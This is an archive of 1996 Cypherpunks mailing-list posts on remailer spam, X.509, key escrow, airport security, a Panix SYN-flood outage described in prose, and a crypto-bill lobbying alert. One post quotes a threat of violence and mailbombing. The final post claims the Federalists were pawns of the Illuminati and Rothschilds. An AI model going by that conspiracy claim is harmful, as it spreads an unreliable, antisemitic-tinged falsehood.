>I could care less about your little applet, or what you have to say; in
>the words of Thomas Jefferson, "it neither breaks my leg nor picks my
>pocket." Until, that is, you start sending it through my remailer, and
>*then* you start picking my pocket. 


>The remailers of the world don't exist
>to provide non-anonymous anonymous advertising, which you could do just as
>well on your own sending forged e-mail headers from netcom.

Now now... forgery is a no-no. And someone always has the freedom to give up
their anonymity whenever they choose. 

>
>Andy Dustman / Computational Center for Molecular Structure and Design / UGA
>===== For PGP public key:  finger andy@neptune.chem.uga.edu | pgp -fka =====
>Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net
>http://charon.chem.uga.edu/~andy    mailto:andy@CCMSD.chem.uga.edu    <}+++<
<>________________Lowest_Priced_Long_Distance__________________<>
||Long Distance 9.9¢/min           |Helping hardworking people ||
||9.9¢ Anytime, Anywhere in US!    |like yourself pay the      ||
||Free sign-up, 6 second billing   |lowest possible price for  ||
||http://www.superhot.com/phone    |high quality LD service.   ||
<>-----------------------1_303_692_5190------------------------<>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@twinds.com>
Date: Fri, 13 Sep 1996 03:39:45 +0800
To: Vince <demo@offshore.com.ai>
Subject: Re: TWA 800 - hit by an unarmed US missile?
In-Reply-To: <Pine.LNX.3.91.960909185902.1462B-100000@offshore>
Message-ID: <Pine.HPP.3.91.960912105226.9302B-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996, Vince wrote:

> 
> 
> 
> Is the press on top of this?
> 
>     --  Vince
> 
> 
When did the press acquire the role of defender of truth, justice, 
honesty or integrity?

Cheers:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@twinds.com
www: http://www.twinds.com

"Life is a journey to adventure and discovery, not a problem to be solved."
-me





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Fri, 13 Sep 1996 03:20:38 +0800
To: stewarts@ix.netcom.com
Subject: Re: ISODE Consortium X.509 Certification system
Message-ID: <3.0b11.32.19960912105914.0054f7b0@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill,

        thanks for forwarding this to me.

        It really bothers me whenever I see someone mouthing plattitudes
about certificates, like: 

>The ITU-T, through X.509, recommend strong authentication based on public 
>key cryptosystems as the basis for providing secure services. The ISODE 
>Consortium uses X.509 as the core of its security strategy. 
>X.509 provides a flexible, scaleable and manageable algorithm-independent 
>authentication infrastructure, which can be used as the basis for a wide
>range of security services such as message encryption and access control. 

Fact is, identity certification (which is what X.509 gives) is neither
necessary nor sufficient for providing secure services -- and there's
nothing magic about X.509.

There are marketeers, however, who want the world to believe that the
generation and use of X.509 certs will somehow give you security -- so they
can sell machinery or a service which makes those certs.

 - Carl

P.S.  My USENIX paper giving the case against certification authorities is
on-line now at <ftp://ftp.clark.net/pub/cme/usenix.ps> =
<http://www.clark.net/pub/cme/usenix.ps>

+------------------------------------------------------------------+
|Carl M. Ellison       cme@acm.org    http://www.clark.net/pub/cme |
|   PGP 2.6.2: 61 E2 DE 7F CB 9D 79 84  E9 C8 04 8B A6 32 21 A2    |
+-Officer, officer, arrest that man. He's whistling a dirty song.--+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Fri, 13 Sep 1996 03:39:02 +0800
To: cypherpunks@toad.com
Subject: Getting the word "GAK" into common usage
Message-ID: <199609121522.LAA106562@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Thu Sep 12 11:20:55 1996
cypherpunks:

As most of you know, I have been trying to bring "our" word, "GAK" into 
common usage, as opposed to the "key-escrow" Newspeak proposed by some 
(unnamed) big-government bureaucrat, and unfortunately adopted in most 
discussions of cryptography policy, (especially those outside this forum) 
in spite of the true English meaning of the word "escrow."

There is a resource called "Infomania," which you can learn about by 
sending a blank message with the subject "help" to <infobot@infomania.com>. 
The service provides, via email, services that are normally only available 
to people who have real internet acess (ie, "WHOIS,") but there is also a 
heavy bias toward humor. Sending it the subject "GEEK," for example, 
returns the current version of the Code of the Geeks. Sending the subject 
CHEF with some dry, boring text (such as this message) in the message body 
returns you a truly hilarious transmogrification. :)

Anyway, I have been in contact with Jason Fesler, who administers the site 
for Infomania [a firm which produces film separations for commercial grade 
printers and which provides this free service] about putting in a new 
command, "GAK," which will return to senders whatever the current U.S. 
govt. "key-escrow" Newspeak bigbrother anti-privacy proposal(s) is/are.
(ie. clipper1, clipper2, son of clipper etc.). He has agreed that if we can 
supply a script or url or gopher page or something of that sort to 
interface it to, and a person to maintain it whenever the policy changes 
yet again (the hard part) he will do it. I would, of course, expect a bit 
of cypherpunkly commentary to accompany the text.

Perhaps this information already exists (likely it does) on some page, and 
if you know where and think it is stable and well-updated, please email me 
privately, and I will try to put the owner of the site in touch with Jason. 
I am Bccing him with this message. Thanks for your help.
JMR


Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjgqXW1lp8bpvW01AQF49wP8Ci8D9blF898dNaFsKesX311qT2MO88zr
xM11xZ0g1Ui4ahv3yB4jo6qqv4Z9InjNpiOk6wxcsXUPPtn6UNCBOTdos/DCk/SO
SSOupiLA48gBHfoCIMN2f/+hGGM4BcuYC5wQ9rgJrTeiY8nQX18hJxKDxujn7z0A
pbvTrSRQozY=
=rA5a
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 13 Sep 1996 06:14:08 +0800
To: cypherpunks@toad.com
Subject: Re: Fear of Flying -- from HotWired
Message-ID: <199609121900.MAA03286@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:16 PM 9/12/96 -0500, Declan McCullagh quoted:
>... former CIA director James Woolsey: responded with some seemingly 
>   gratuitous anti-Net
>   rhetoric. Terrorists may use biological weapons like anthrax, he said.
>   "Anthrax is colorless, odorless, and has a 90 percent lethality. One
>   gram has 100 million lethal doses." Then Woolsey delivered the zinger:
>   "The knowledge of how to make anthrax is widely available, including
>   on the Internet."

Gee, biotech has come a long way.  Now I can download the Anthrax DNA
sequence from the net and insert it in some carrier bacteria and start
making Anthrax bacteria.  Neat!

Or did he mean I can chemically synthesize Anthrax toxin?  Or did he mean I
can get information on culturing bacteria on the net, but must obtain a
sample of the bacteria from other sources?

BTW - My dictionary says that Anthrax is primarily an animal disease which
only occasionally infects humans.  It sounds like a poor choice for bio-war
terror.


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 12 Sep 1996 12:56:50 +0800
To: saione@primenet.com
Subject: Re: talker
In-Reply-To: <199609120013.RAA23678@primenet.com>
Message-ID: <199609120227.MAA03680@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> Mailbomb me, go ahead punk, make my day, if you dare to even think 
> about doing so I will kick your ass, I will hurt you in ways you 
> cannot imagine, I have carried out vindictive personal vendettas 
> before and will do so again if necessary.
> 
>  Go on, I dare you, I double dare you motherfucker. 
> 
> Yours with the greatest respect:
> 
> Paul Bradley MbM

Yawn. Says more about you than him kiddo.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.v-site.net>
Date: Fri, 13 Sep 1996 06:58:09 +0800
To: zinc@zifi.genetics.utah.edu
Subject: Re: mailing lists
In-Reply-To: <323850BF.B46@precipice.v-site.net>
Message-ID: <3238648F.207@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain


>i don't see you sticking your neck out to deal with assholes who think
>freedom of speech is secondary to their right not to ever see mail
>they don't want. 

Like hell we're not.  What are you guys mad at us for?  Thinking that
FREEDOM of SPEECH is much, much more important that whining computer
nerds who can't push a DELETE button.

>i did competitive public speaking from 7th grade until my junior year
>of high school where i was also on the debate team for two years.

In that case, maybe you should learn to use the SHIFT key.  Or didn't
debaters in your school take typing and/or learn about punctuation,
capitalization, and the other niceties of English communication?

>now i make a living as a biochemistry grad student (only a year left
>until you get to call me Dr.) where logic is paramount and feelings
>are irrelevant.

Well, "doctor" why can't you see (with your logic) that junk Email (or
"spam") would save many, many forests if it REPLACED junk SnailMail.

Isn't it just that your "irrelevant feelings" have been hurt, because
someone used your remailer-baby in a way you hadn't planned for ?!?

Why not put your money where your mouth is, and bet me (any amount),
that spam WILL be socially acceptable by the year 2000.  Particularly,
when the green-folks discover how many trees will be saved.  It'll be
a social-mandate, NOT just a suggestion.  Want to bet?


-- HTTP://www.HIPCRIME.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Fri, 13 Sep 1996 05:36:12 +0800
To: cypherpunks@toad.com
Subject: (Correction) Child Porn as Thoughtcrime
Message-ID: <199609121758.MAA27427@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:

: I've read in several places that the Jock Sturges case was thrown out
:   Nobody has dragged me away in shackles for
: owning "Radiant Images."

Correction -- That's "Radiant Identities."

Rick.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 13 Sep 1996 05:02:58 +0800
To: cypherpunks@toad.com
Subject: Fear of Flying -- from HotWired
Message-ID: <v01510100ae5e034bb1a4@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain



http://www.hotwired.com/netizen/96/37/special3a.html

12 September 96

HotWired, The Netizen

Fear of Flying
by Declan McCullagh (declan@well.com)
Washington, DC, 11 September


   John Gilmore, co-founder of the Electronic Frontier Foundation,
   knows firsthand how drastically airports in the United States are
   altering their policies in response to the nation's perceived
   vulnerability to terrorists.

   When Gilmore opened his laptop for inspection by airport personnel at
   San Francisco International last month - as requested - but refused to
   turn the machine on, the cops were called. When he then refused to
   show identification to airport police, "they put the handcuffs on me
   and hauled me off," he told The Netizen.

   The cops took Gilmore to a back-room office. "They tried to ask me
   questions. I said I wanted to speak to my lawyer. They kept asking me
   questions anyway," he says. Airport police arrested Gilmore even
   though, according to the FAA, "there is currently no prohibition
   against allowing someone on an aircraft" without identification.

   Gilmore's arrest came after President Clinton tightened airport
   security in response to the TWA Flight 800 disaster and the Atlanta
   Olympic Games bombing. Now the anti-terrorism drumbeat in the nation's
   capital is starting again, and it's louder and more ominous than ever.
   It reached a fevered pitch Monday, when Clinton called for an increase
   of more than one billion dollars to be spent on anti-terrorism
   measures, especially airport security.

   Clinton based his request on the unsurprising recommendations of a
   commission created by executive order in August, staffed by spooks and
   headed by Vice President Gore. The group's proposal includes a plan
   allowing the CIA and FBI to "develop a system" to screen passengers
   who fit certain profiles as potential terrorists.

   David Sobel, a lawyer with the Electronic Privacy Information Center,
   called the White House proposal "a realization of Big Brother concerns
   people have about computer technology." The proposal would allow the
   FBI and CIA to couple their databases with those of the airlines.

   "There are going to be massive databases that will track our actions
   and activities. If you think of increased capabilities to collect
   information, it's even scarier," Sobel said.

   A former US senator agrees. At a Cato Institute terrorism conference
   yesterday, Malcolm Wallop said: "In the year and a half since the
   terrorism debate began, all the legislation considered would do little
   or nothing to stop or deter terrorism. These measures do more to crack
   down on Americans than terrorists.

   "A bloody nose does not warrant an exponential expansion of federal
   government authority," argued Wallop, now the chairman of the
   Frontiers of Freedom Institute.

   Over lunch at the conference yesterday afternoon, former CIA director
   James Woolsey responded with some seemingly gratuitous anti-Net
   rhetoric. Terrorists may use biological weapons like anthrax, he said.
   "Anthrax is colorless, odorless, and has a 90 percent lethality. One
   gram has 100 million lethal doses." Then Woolsey delivered the zinger:
   "The knowledge of how to make anthrax is widely available, including
   on the Internet."

   Not content to let bad enough alone, Woolsey added that the government
   can't allow netizens to use data-scrambling software like Pretty Good
   Privacy that the spooks can't break. He said the threat of terrorism
   will "require us to have a key escrow system" where keys "for complex
   algorithms [will] be placed in such a way that the government" will
   have access to them.

   "You can accommodate industry a lot, but the principle is: you got to
   get to the key," Woolsey said. (FBI director Louis Freeh made similar,
   though less straightforward, comments during Senate hearings in July.)

   Before Congress adjourns for the fall recess, the House must decide
   whether to approve a "digital telephony" domestic wiretapping slush
   fund into which the NSA and CIA can pour cash. Senators will then
   likely add provisions for warrantless wiretaps to the anti-terrorism
   bill that the House sent to them in August.

   The fundamental problem here is, of course, the politics of terrorism.
   Legislators routinely grandstand atop national tragedies, using
   victims and their families as backdrops. Justice Department lobbyists
   then swarm onto Capitol Hill and demand reduced civil liberties in the
   name of fighting terrorism.

   Societies can, and should, safeguard against systematic threats.
   Random acts of violence, on the other hand, are trickier to forestall
   - and terrorist acts are anything but predictable.

   Luckily for the EFF's Gilmore, he was cited only for the crime of
   "delaying/obstructing a peace officer" and was released after being
   handcuffed to a bench and then dumped in a holding cell for a few
   hours. He got off easy.

   But if Congress decides to sacrifice freedom for security, the country
   will ultimately enjoy neither.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 13 Sep 1996 05:00:18 +0800
To: #6 <cypherpunks@toad.com
Subject: Re: PANIX.COM down: denial of service attack
Message-ID: <2.2.32.19960912175446.008bf064@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:09 AM 9/12/96 -0700, #6 wrote:
>WSJ 9/12/96
>
>Paraphrasing:
>
>Panix has been under attack for the last week by someone flooding
>their server with bogus "requests for information" [see below] ...

Even though service has suffered, Panix is still useable.  Until I read the
MOTDs on Tuesday, I thought it was just normal flakiness.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 13 Sep 1996 07:48:34 +0800
To: coderpunks@toad.com
Subject: CryptLib CAPI for VB
Message-ID: <3.0b11.32.19960912140334.0069ea08@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/enriched

Before I do it myself, thought I'd check if anyone has updated Peter
Gutmann's CRYPT.BAS file for CryptLib (if not, I'll forward it to Peter
when I get finished).  The current version is fairly out of date, and I'm
looking for a library to use with Visual Basic to implement some secure
hashing and 3DES.  

Thanks in advance...

Joel 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 13 Sep 1996 05:55:20 +0800
To: cypherpunks@toad.com
Subject: Re: PANIX.COM down: denial of service attack
Message-ID: <2.2.32.19960912182630.008b6324@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Here are the gory details from the first MOTD last Saturday:

               The attacker is forging random source addresses on his
               packets, so there is no way to find his/her location. There
               is also no way to screen out those packets with a simple
               router filter.

               This is probably the most deadly type of denial-of-service
               attack possible. There is no easy or quick way of dealing
               with it. If it continues into Saturday we will start working
               on kernel modifications to try to absorb the damage
               (since there's absolutely no way to avoid it). This
               however will not be an easy job and it could take days to
               get done (and get done right).

               For those who are IP hackers, the problem is that we're
               being flooded with SYNs from random IP addresses on
               our smtp ports. We are getting on average 150 packets
               per second (50 per host).

               We are not the only site being attacked in this way. I
               know of one other site that is being attacked in an
               identical manner right now, and I know of three others
               that have been attacked in the last two weeks. I hope that
               this means that the attacker is merely playing malicious
               games, and will soon tire of molesting our site. If that is
               the case, mail will come back up as soon as the attack
               ends. But if the attacker is really interested in damaging
               Panix specifically, the attack may *never* stop and
               service won't be restored until we can write kernel
               modifications.


Since then the packet streams have hit almost all the ports for news, www,
telnet, etc.  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Fri, 13 Sep 1996 06:48:08 +0800
To: cypherpunks@toad.com
Subject: ALERT: S.1726 vote postponed; keep calling!  Offices are swamped! (9/11/96)
Message-ID: <199609121839.OAA09646@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


========================================================================

                SENATE COMMERCE COMMITTEE VOTE POSTPONED
         SENATOR BURNS ENCLOSES LETTER OF COMMITTMENT TO CRYPTO

          WE CONTINUE TO RECEIVE REPORTS OF "HEAVY CALLS" TO
        OFFICES.  KEEP THE PRESSURE UP!  WE'RE HOLDING OUR OWN!

                         September 12, 1996

      Please widely redistribute this document with this banner intact
                        until September 30, 1996

________________________________________________________________________
CONTENTS
        The Latest News
        What You Can Do Now
        Background / What To Expect This Week
        Description of S.1726, Pro-CODE Bill
        Chronology of Pro-Crypto Legislation
        For More Information / Supporting Organizations

________________________________________________________________________
THE LATEST NEWS

The Senate Commerce Committee vote on S.1726 (Pro-CODE) originally set for
today (Thursday 9/12) has been postponed. We have been told that the change
was largely due to committee scheduling issues, and the Committee staff and
have indicated that they are still committeed to marking up S. 1726 within
the next.  More information should be available shortly.

Senator Conrad Burns (R-MT), co-author of S. 1726, asked us to forward the
following note to the net.community:

   X-POP3-Rcpt: jseiger@mailserver
   From: Conrad_Burns@burns.senate.gov
   Date: Thu, 12 Sep 96 09:55:35 EST
   To: jseiger@cdt.org
   Subject: Open Letter to the Internet from Senator Burns

     The Commerce Committee markup on Pro-CODE, S. 1726, that we had
     expected to have held on Thursday, September 12 has been postponed.  I
     am fully committed to taking Pro-CODE to markup, out of committee and
     onto the floor of the Senate in this Congress.  I believe that this
     legislation is vital to ensuring the continued strength of America's
     high-tech community and the privacy of its citizens.  I would like to
     thank the many thousands of Netizens who have expressed their support
     for Pro-CODE.

     Sincerely,

     U.S. Senator Conrad Burns

It is critical to keep your phone calls and faxes coming into the offices
of the Committee members listed below.  Based on the feedback we are
receiving from callers and conversations with Capitol Hill staff, the
response from the Net has been strong and continuous.  Thank you to all who
have taken the time to call Congress to voice your support for encryption
policy reform.

If you have not yet done so, please take a moment to call the committee
members below.  If you have a little extra time on your hands, between now
and the middle of next week please make an effort to call all the Senators
on the list below.  Your help and support is critical to the future of
privacy and security on the Internet.

Finally, please don't forget to sign the petition in support of Encryption
Policy Reform --  http://www.crypto.com/petition/.  More than 4000 Netizens
have already signed, including encryption experts Phil Zimmermann, Matt
Blaze, Phil Karn, and others.

________________________________________________________________________
WHAT YOU CAN DO NOW

It's crucial that you call the Commerce committee members below and
urge them to pass S.1726 out of committee without amendments.  (This is
also known as a "clean" bill.)  Any opportunity for amendments (even if
they are good) opens us up to the possibility of hostile amendments
that could restrict the use of encryption even further than today's
abysmal state.  It could even prohibit the use of encryption without
Clipper Chip-like key 'escrow' technology, which includes built-in
surveillance and monitoring functionality.

1. Call/Fax the members of the Senate Commerce committee and urge
   them to pass S.1726 out of committee "cleanly".  Do not use email,
   as it is not likely to be looked at in time to make a difference.

   Use the sample communique and directory listing below to make it a
   simple TWO MINUTE task.

2. Sign the petition to support strong encryption at
   http://www.crypto.com/petition/   !  Join other cyber-heroes as
   Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and
   others who have also signed.

3. Over the next 7 days, it is crucial that you call all these members of
   the Senate Commerce Committee.

      P ST Name and Address           Phone           Fax
      = == ========================   ==============  ==============
      D SC Hollings, Ernest F.        1-202-224-6121  1-202-224-4293
      D MA Kerry, John F.             1-202-224-2742  1-202-224-8525
      D HI Inouye, Daniel K.          1-202-224-3934  1-202-224-6747
      D KY Ford, Wendell H.           1-202-224-4343  1-202-224-0046
      D WV Rockefeller, John D.       1-202-224-6472  1-202-224-7665
      D LA Breaux, John B.            1-202-224-4623  1-202-228-2577
      D NV Bryan, Richard H.          1-202-224-6244  1-202-224-1867
      D ND Dorgan, Byron L.           1-202-224-2551  1-202-224-1193
      D NE Exon, J. J.                1-202-224-4224  1-202-224-5213
      D OR Wyden, Ron*                1-202-224-5244  1-202-228-2717

      R SD Pressler, Larry*           1-202-224-5842  1-202-224-1259
      R MT Burns, Conrad R.(*sponsor) 1-202-224-2644  1-202-224-8594
      R AK Stevens, Ted               1-202-224-3004  1-202-224-2354
      R AZ McCain, John*              1-202-224-2235  1-202-228-2862
      R WA Gorton, Slade              1-202-224-3441  1-202-224-9393
      R MS Lott, Trent*               1-202-224-6253  1-202-224-2262
      R TX Hutchison, Kay Bailey      1-202-224-5922  1-202-224-0776
      R ME Snowe, Olympia             1-202-224-5344  1-202-224-1946
      R MO Ashcroft, John*            1-202-224-6154  1-202-228-0998
      R TN Frist, Bill                1-202-224-3344  1-202-228-1264
      R MI Abraham, Spencer           1-202-224-4822  1-202-224-8834

        * supporter or cosponsor.  The bill also enjoys broad bi-partisan
        support from members not on the committee including Senators Leahy
        (D-VT) and Murray (D-WA).

4. Here is a sample conversation:

   SAMPLE PHONE CALL
        You:<ring ring>
        Sen:Hello, Senator Mojo's office!

        You:

SAY     I'm calling to urge the Senator to pass S.1726, the  Burns, Leahy,
THIS->  Pressler bill at the upcoming Commerce Committee Markup.  The bill
        is critical to the future of privacy, security, and electronic
	commerce on the internet.

        Sen:Ok, thanks!<click>

   IF THEY SAY
        "The Senator has concerns about the bill",
   please answer,
        "Please try to work these issues out as it moves to the Senate floor,
         but passage out of committee will send an important signal to
         the Administration."

5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM
   YOU.  Please tell us who you called, and how they sounded.  We'll be
   passing this information to folks in D.C. who can help apply pressure
   where needed.

        $ Mail vtw@vtw.org
        Subject: I called so-and-so

        Hey, I called Sen. Mojo.  He sounded iffy, call in the
        reinforcements.
        ^D

6. Forward this to your friends and colleagues in appropriate forums
   until the date of expiration at the top.  Forward a copy of this to
   your Internet Service Provider as well, and ask them to put the following
   text in their message of the day (motd), or on their WWW page:

        ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT

        The U.S. Senate will be voting on a proposal to encourage
        better security on the Internet soon.  Your help is
        needed to call Congress.  See http://www.crypto.com/ for more
        details.

        ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT

________________________________________________________________________
BACKGROUND / WHAT TO EXPECT THIS WEEK

For the past 3 years, Cyber-Rights Activists, citizens, and industry
leaders have been working hard to reform US encryption policy.

Support has been building behind several legislative proposals this
year because they send a clear signal to the Administration about the
need for security and privacy in the Information Age.  The digital
revolution is currently being held hostage by the White House's Cold
War restrictions on privacy-enhancing encryption technology.

Now, with Congress less than a month away from adjournment, everyone
who supports encryption and privacy is working to see this bill leave
committee in order to send a clear message to the White House that they
are on the wrong side of the encryption issue.  Although this bill may
not become law this year, its passage out of committee will be a
landmark event that will clearly tell the White House that the
Congress, the public, and the computer industry care about security and
privacy, and need strong, reliable encryption technology in order to
make the Internet a viable platform for commerce, education, and
democracy.

Success for our side is not certain, and the next week is not without risks.
On September 12th (or sometime soon after), the Senate Commerce committee
is expected to hold a "markup", where the bill is examined, voted on, and
if there are enough votes, passed out of committee.  Two things could
happen:

        -the committee could pass the bill as written,
        -the committee could pass the bill with amendments.

Any amendments are not likely to be friendly, and in particular, quiet
sources have told privacy activists that the Clinton Administration has been
readying a legislative assault on your right to use encryption for several
weeks now.  A Clipper-like amendment could be attached to the bill if
our side does not have enough votes to block all amendments.

It is crucial that all netizens who consider privacy and security important
take a moment to call members of the Commerce Committee right now and
urge them to vote S.1726 out of committee without amendments.

________________________________________________________________________
DESCRIPTION OF S.1726, PRO-CODE BILL

Privacy-enhancing encryption technology is currently under heavy restrictions
kept in place by the White House.  Encryption that is currently allowed to
be exported is not sufficient to protect confidential information.  This
policy acquires an "Alice-in-Wonderland" quality when one realizes that
strong encryption products are available abroad both for sale and for free
download off the Internet.

The Pro-CODE Act resolves to:

1.  Allow for the *unrestricted* export of "mass-market" or "public-domain"
    encryption programs, including such products as Pretty Good Privacy and
    popular World Wide Web browsers.

2.  Requires the Secretary of Commerce to allow the less restricted export
    of other encryption technologies if products of similar strength are
    generally available outside the United States, roughly up to DES
    strength.

3.  Prohibits the federal government from imposing mandatory key-escrow
    encryption policies on the domestic market and limiting the authority
    of the Secretary of Commerce to set standards for encryption products.

________________________________________________________________________
CHRONOLOGY OF PRO-CRYPTO LEGISLATION

9/12/96 (scheduled)
Senate Commerce committee will hold markup of S.1726 and hopefully pass it
out of committee with no amendments.

7/25/96: Full Senate Commerce committee holds positive hearings on S.1726.
FBI Director Louis Freeh testifies along with many cyber-luminaries.
Hearings are cybercast Internet Cyber-Rights activists with HotWired
and WWW.Crypto.Com.  You can see the photos, read the testimony, and
listen to the audio transcript at http://www.crypto.com/events/072596/

6/26/96: Senate subcommittee holds positive hearings on S.1726.  Hearings are
cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com.
You can see the photos, read the testimony, and listen to the audio
transcript at http://www.crypto.com/events/062696/

5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would
free public-domain encryption software (such as PGP) for export, free much
commercial encryption for export, and reduce the government's ability to
push Clipper proposals down the throats of an unwilling public.  Original
sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC),
Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR).

3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills
(S.1587/H.R.3011) that significantly relax export restrictions on products
with encryption functionality in them, as well as free public domain software
such as PGP (Pretty Good Privacy).

________________________________________________________________________
FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS

There are many excellent resources online to get up to speed on crypto
including the following WWW sites:

http://www.crypto.com       http://www.privacy.org    http://www.eff.org
http://www.cdt.org          http://www.epic.org       http://www.vtw.org

Please visit them often.

The following organizations have signed onto this alert:

        American Civil Liberties Union
        Center for Democracy and Technology
        Electronic Frontier Foundation
        Electronic Privacy Information Center
        Voters Telecommunications Watch

________________________________________________________________________
End alert
========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 13 Sep 1996 03:26:01 +0800
To: Chip Mefford <cmefford@avwashington.com>attila
Subject: Re: Bubba Bottoming out on Cocaine Paranoia?
In-Reply-To: <v03007808ae5dadc0f80f@[207.79.65.35]>
Message-ID: <199609121502.JAA19550@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <v03007808ae5dadc0f80f@[207.79.65.35]>, on 09/12/96 
   at 08:16 AM, Chip Mefford <cmefford@avwashington.com> said:


= >        2.   the rewrite of history to reflect not only the 
= >             politically correct views, but to reflect history as 
= >             the elite wish to see it --even to the point of rewriting
= >             quotations of Thomas Jefferson to suit their purpose.
= >
= Can you give a clear example of this??

= Just asking

        the most blatant one was the rewording of Jefferson's words
    for the equality of all men about two years ago.  As we know, 
    Jefferson was all for freedom, and had a "God bless you, you're
    a slave" attitude, but he was clearly not for the equalization. 
    when that one came out of washington, several papers had a 
    hard time with it, but I have seen it since.

        I have been collecting Jefferson quotes for years; frankly, I
    always considered the Dems were off base: Jefferson was the 
    Republican --leaving Hamilton and his Federalists as pawns pawns 
    of the Illuminati as advocates of the independent Federal Bank 
    (the worst of the Rothschilds (Maurice, I think) who made the 
    statements regarding control of the government by control of the 
    money was in his prime around 1800). 

        I am not a dedicated Jeffersonian scholar, but he has been 
    the corner stone of my (now long blown) faith in our government. 
    I would a complete set of Jefferson's works --if, and only, if I
    could find a good edition published over a 100 years ago.

        secondly, Jefferson is now interpreted as being the great 
    enfranchiser, which is not even close to his view. Jefferson's 
    writings clearly emphasize that the electorate should be comprised
    of the landed and merchant class; secondly, it was Jefferson's 
    statement that the electorate, and therefore the juries should be
    composed "...of a well educated and informed citizenry." 
    Jefferson was interested in an electorate which was of 
    substance and possessing of a stake in America.

        One of the clear principles of Jeffersonian thought was that
    jury, beyond the requirement of guilt beyond a reasonable doubt,
    was to _vote its conscience_.  Jefferson was responsible for 
    including the constitutional language which makes this possible, 
    even today, despite instructions from judges who could care less 
    about the intent of the constitution and are treating the accused 
    as nothing more than cattle on the way to the abattoir --if they 
    are not guilty this time they will be next time, so why waste 
    further time --sometimes known as "collateral damage." 



= >         Why has it gone this far?  because Joe-Six-Pack will sell  
= >     all his freedom in return for the promised security.  who is    
= >    the Judas goat?  the captive press.
= >

= Actually, being a "Joe six pack" my own damn self, I'd have to say
= that this is simply not the case. It is Joe six pack who makes up the
= body of the NRA and most other freedom watch dog organizations.
= Just for yer information, the pendulem has been swinging very much
= the other way, with 36 or 37 states recently following Floridas lead
